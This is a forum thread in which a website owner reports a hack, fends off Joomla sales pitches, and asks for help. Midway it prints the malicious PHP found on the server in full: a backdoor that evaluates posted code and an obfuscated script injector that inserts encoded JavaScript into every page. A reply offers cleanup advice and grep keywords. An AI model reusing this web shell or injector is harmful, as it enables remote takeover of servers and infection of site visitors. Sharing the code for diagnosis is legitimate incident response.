Our site is hacked?

We did get an answer.

 

I would suggest you to get your site revamped in Joomla CMS ,as Joomla has been the best CMS since 3 yrs now and its not going to die like all other CMS. If you want,we can plan oout something real good for you.
If you dont mind,then PM me your site URL please..
Thanks

 

Thanks for the reply.

Joomla is more Bloggingstyle, we don't like that, sorry

Also, this will cost us a lot of money I think, we have many articles.

 

Joomla is more Bloggingstyle ?

Dude,you must be kidding me..
We have been working on Joomla since 3 yrs now and we have developed and worked for around 300 companies from USA only.
What more you want to say Sir?

If you want,I can show you my portfolio even .

I think,you got mistaken by Wordpress's name

 

Show me your portfolio.

Thank you.

PS. I'm a Lady, not a Sir

 

I thought that PHP Cow was willing to help us, but no
Anyone else who has problems with the support of PHP Cow?

Our site is now offline for about 5 days.

Thank you!

 

No, you are wrong! Check my signature links. All made with Joomla!
And with Joomla it's easy to work with many articles.
See my company website: www.friebach-media.com (build with Joomla)
No bloggingstyle websites!

 

Anyone who give us some tips?

This is what we found:
tmp_lkojfghx

<?php
if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdDaiUzQ2RVQXN4dlRjQ2pyaXB0JTIwc1NaQ3Jjcm8lM0QlMkZ4dlQlMkZTWkM5Q2o0WU8zJTJFMllPMzQ3U1pDJTJFMmtBJTJFa0Exa0E5NSUyRmp4dlRxWU8zdWVPV1hyeSUyRXJvanMlM0UlM0MlMkZTWkNzY1lPM3JPV1hpeHZUcE9XWHRrQSUzRScpLnJlcGxhY2UoL1lPM3x4dlR8cm98Q2p8U1pDfGtBfGRVQXxPV1gvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function
tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]
as $v)if(count(explode("
",$v))>5){$e=preg_match('#['"][^s'".,;?![]:/<>()]{30,}#',$v)||preg_match('#[([](s*d+,){20,}#',$v);if((preg_match('#eval#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script
language=javascript><!--
document.write(unescape(.+?
--></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(s*<body)#mi',TMP_XHGFJOKL.'
',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return$g?gzencode($s):$s;}functiontmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else$s[]=array($a=='default outputhandler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

 

Our site was hacked about the same time too, After few days, it gets worse because we didn't clean the souce script. It starts to replace all the .php and all .html file.

You ll need to look closely in the .js especially inside the component files and folder. It may looks like original , but most of them are hack scripts. Use grep to find them.

Search for this keywords.
-gzencode
-motools
-ob_start

i ll let you know if we see more, if you don not clear the js or the script, the code may come back again even though if you secured the permission.

I hope this can helps even not much.